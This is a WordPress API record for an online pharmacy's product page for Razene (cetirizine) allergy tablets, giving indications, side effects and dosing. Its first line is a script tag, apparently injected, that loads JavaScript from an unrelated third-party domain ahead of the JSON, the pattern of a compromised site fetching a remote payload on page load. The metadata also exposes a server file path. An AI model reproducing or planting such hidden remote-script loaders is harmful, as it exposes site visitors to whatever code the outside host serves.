<script type='text/javascript' src='//existingcraziness.com/ec/83/1b/ec831b2e2c34253e0e8ffd8198a71343.js'></script>{"id":3407,"date":"2021-07-24T12:49:20","date_gmt":"2021-07-24T12:49:20","guid":{"rendered":"https:\/\/gsgpharma.com\/?post_type=product&#038;p=3407"},"modified":"2021-07-24T12:49:21","modified_gmt":"2021-07-24T12:49:21","slug":"razene-10mg-tablets-90-tablets","status":"publish","type":"product","link":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets","title":{"rendered":"RAZENE 10MG TABLETS 90 TABLETS"},"content":{"rendered":"<div class=\"product product-recommendations-position-below\" data-ajax=\"\" data-linked-options=\"\" data-images-slideshow=\"\">\n<div class=\"product-details-wrapper\">\n<div class=\"product-details\">\n<div class=\"product-description rte\">Razene (Cetirizine) 10mg Tablets work for the fast relief of allergies. It is a once a day anti-allergy treatment for alleviating symptoms associated with seasonal rhinitis (hay fever), perennial allergic rhinitis, conjunctivitis, hives (urticaria) and even insect bites. It introduces the active ingredient, Cetirizine Hydrochloride, an antihistamine.<\/p>\n<p>Razene (Cetirizine) 10mg Tablets contain Cetirizine Hydrochloride which inhibits the action of histamine by blocking receptor sites. In effect, release of histamine which induces inflammation and irritation, is stopped. In effect, allergic reactions are prevented.<\/p>\n<p>Razene (Cetirizine) 10mg Tablets deliver an immediate acting formula that takes effect within 20 minutes of use. Plus, it is long lasting to give you relief for up to 24 hours. It works by alleviating the following symptoms:<\/p>\n<p>Sneezing<br \/>\nRunny nose (Rhinorrhea)<br \/>\nPost-nasal discharge<br \/>\nItchy nose (nasal pruritus)<br \/>\nItchy eyes (ocular pruritus)<br \/>\nWatery eyes (tearing)<br \/>\nThe Action of Antihistamines<br \/>\nAntihistamines are used for the treatment of symptoms associated with allergies including sneezing, itching and watery eyes. It can also treat insect bites and inflammatory conditions of the skin. If you are unsure of which antihistamine would suit you best please contact our pharmacist.<\/p>\n<hr \/>\n<p><b>Ingredients<\/b><br \/>\nEach tablet contains: Cetirizine 10mg<\/p>\n<hr \/>\n<p><b>Directions &amp; Precautions<\/b><br \/>\nDo not take Razene if you have an allergy to any of the following:<\/p>\n<p>any medicine containing cetirizine<br \/>\nhydroxyzine (another antihistamine related to cetirizine).<\/p>\n<p>Side Effects<\/p>\n<p>Tell your pharmacist or doctor as soon as possible if you do not feel well while you are taking Razene.<br \/>\nAll medicines can have some unwanted effects. Sometimes they are serious, most of the time they are not. You may need medical treatment if you get some of the side effects.<br \/>\nTell your pharmacist or doctor if you notice any of the following and they worry you:<\/p>\n<p>drowsiness<br \/>\nheadache<br \/>\ndry mouth<br \/>\ntiredness<br \/>\nnausea<br \/>\ndizziness.<\/p>\n<p>These are the more common side effects of Razene. They are usually mild and tend to wear off as treatment continues.<\/p>\n<p>Tell your doctor immediately if you notice any of the following:<\/p>\n<p>swelling of the face, lips or tongue which may cause difficulty in swallowing or breathing<br \/>\nasthma, wheezing, shortness of breath<br \/>\nsudden or severe itching, skin rash, hives<br \/>\nfast or irregular heart beat.<\/p>\n<p>These side effects are usually rare but can be serious and need urgent medical attention.<\/p>\n<p>Adults and children 6 years of age or older take one 10mg tablet daily. This can be divided into two 5mg (1\/2 a tablet) doses.<br \/>\nChildren aged between 2 and 6 years &#8211; Take 2.5mg (1\/4 of a tablet) twice daily or 5mg (1\/2 a tablet) once daily.<br \/>\nRazene should not be used by children under 2 years of age unless otherwise advised by your doctor or pharmacist.<br \/>\nThe effects of Razene will not last as long in children as they do in adults so it is recommended that you split the dosage into two for children.<br \/>\nDo not take a double dosage of Razene tablets if you forget to take your next dose. If you miss a dose but remember over 12 hours before you are due to take your next dose then take it as normal. If it is almost time for your next dose, skip the missed dose and take only your next regularly scheduled dose.<br \/>\nSome people may find that they only require half the recommended daily dose for relief. Razene can be taken at any time of the day and may work a little faster if not taken with food. If Razene makes you feel drowsy then you are best to take it before going to bed at night or you can reduce the dosage by half.<br \/>\nThe maximum daily dose is 20mg, the equivalent of two tablets, and this should not be exceeded unless instructed to do so by your doctor or pharmacist.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"product-recommendations-wrapper\" data-product-recommendations=\"\">\n<h2 class=\"section-title\">CUSTOMERS ALSO VIEWED<\/h2>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Razene (Cetirizine) 10mg Tablets work for the fast relief of allergies. It is a once a day anti-allergy treatment for alleviating symptoms associated with seasonal rhinitis (hay fever), perennial allergic rhinitis, conjunctivitis, hives (urticaria) and even insect bites. It introduces the active ingredient, Cetirizine Hydrochloride, an antihistamine. Razene (Cetirizine) 10mg Tablets contain Cetirizine Hydrochloride which [&hellip;]<\/p>\n","protected":false},"featured_media":3406,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[242],"product_tag":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>RAZENE 10MG TABLETS 90 TABLETS - GSG Pharma<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"RAZENE 10MG TABLETS 90 TABLETS - GSG Pharma\" \/>\n<meta property=\"og:description\" content=\"Razene (Cetirizine) 10mg Tablets work for the fast relief of allergies. It is a once a day anti-allergy treatment for alleviating symptoms associated with seasonal rhinitis (hay fever), perennial allergic rhinitis, conjunctivitis, hives (urticaria) and even insect bites. It introduces the active ingredient, Cetirizine Hydrochloride, an antihistamine. Razene (Cetirizine) 10mg Tablets contain Cetirizine Hydrochloride which [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets\" \/>\n<meta property=\"og:site_name\" content=\"GSG Pharma\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-24T12:49:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png\" \/>\n\t<meta property=\"og:image:width\" content=\"448\" \/>\n\t<meta property=\"og:image:height\" content=\"448\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/gsgpharma.com\/#website\",\"url\":\"https:\/\/gsgpharma.com\/\",\"name\":\"GSG Pharma\",\"description\":\"Your Healthful Choice in Online Partnership\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/gsgpharma.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png\",\"contentUrl\":\"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png\",\"width\":448,\"height\":448},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#webpage\",\"url\":\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets\",\"name\":\"RAZENE 10MG TABLETS 90 TABLETS - GSG Pharma\",\"isPartOf\":{\"@id\":\"https:\/\/gsgpharma.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#primaryimage\"},\"datePublished\":\"2021-07-24T12:49:20+00:00\",\"dateModified\":\"2021-07-24T12:49:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/gsgpharma.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/gsgpharma.com\/?page_id=5\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"RAZENE 10MG TABLETS 90 TABLETS\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"RAZENE 10MG TABLETS 90 TABLETS - GSG Pharma","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets","og_locale":"en_US","og_type":"article","og_title":"RAZENE 10MG TABLETS 90 TABLETS - GSG Pharma","og_description":"Razene (Cetirizine) 10mg Tablets work for the fast relief of allergies. It is a once a day anti-allergy treatment for alleviating symptoms associated with seasonal rhinitis (hay fever), perennial allergic rhinitis, conjunctivitis, hives (urticaria) and even insect bites. It introduces the active ingredient, Cetirizine Hydrochloride, an antihistamine. Razene (Cetirizine) 10mg Tablets contain Cetirizine Hydrochloride which [&hellip;]","og_url":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets","og_site_name":"GSG Pharma","article_modified_time":"2021-07-24T12:49:21+00:00","og_image":[{"width":448,"height":448,"url":"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png","path":"\/home\/u979399792\/domains\/gsgpharma.com\/public_html\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png","size":"full","id":3406,"alt":"","pixels":200704,"type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/gsgpharma.com\/#website","url":"https:\/\/gsgpharma.com\/","name":"GSG Pharma","description":"Your Healthful Choice in Online Partnership","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/gsgpharma.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#primaryimage","inLanguage":"en-US","url":"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png","contentUrl":"https:\/\/gsgpharma.com\/wp-content\/uploads\/2021\/07\/af609877bbd9c3f60fcc6600380bd964_448x448.png","width":448,"height":448},{"@type":"WebPage","@id":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#webpage","url":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets","name":"RAZENE 10MG TABLETS 90 TABLETS - GSG Pharma","isPartOf":{"@id":"https:\/\/gsgpharma.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#primaryimage"},"datePublished":"2021-07-24T12:49:20+00:00","dateModified":"2021-07-24T12:49:21+00:00","breadcrumb":{"@id":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/gsgpharma.com\/?product=razene-10mg-tablets-90-tablets#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/gsgpharma.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/gsgpharma.com\/?page_id=5"},{"@type":"ListItem","position":3,"name":"RAZENE 10MG TABLETS 90 TABLETS"}]}]}},"_links":{"self":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/product\/3407"}],"collection":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3407"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=\/wp\/v2\/media\/3406"}],"wp:attachment":[{"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3407"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=3407"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/gsgpharma.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=3407"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}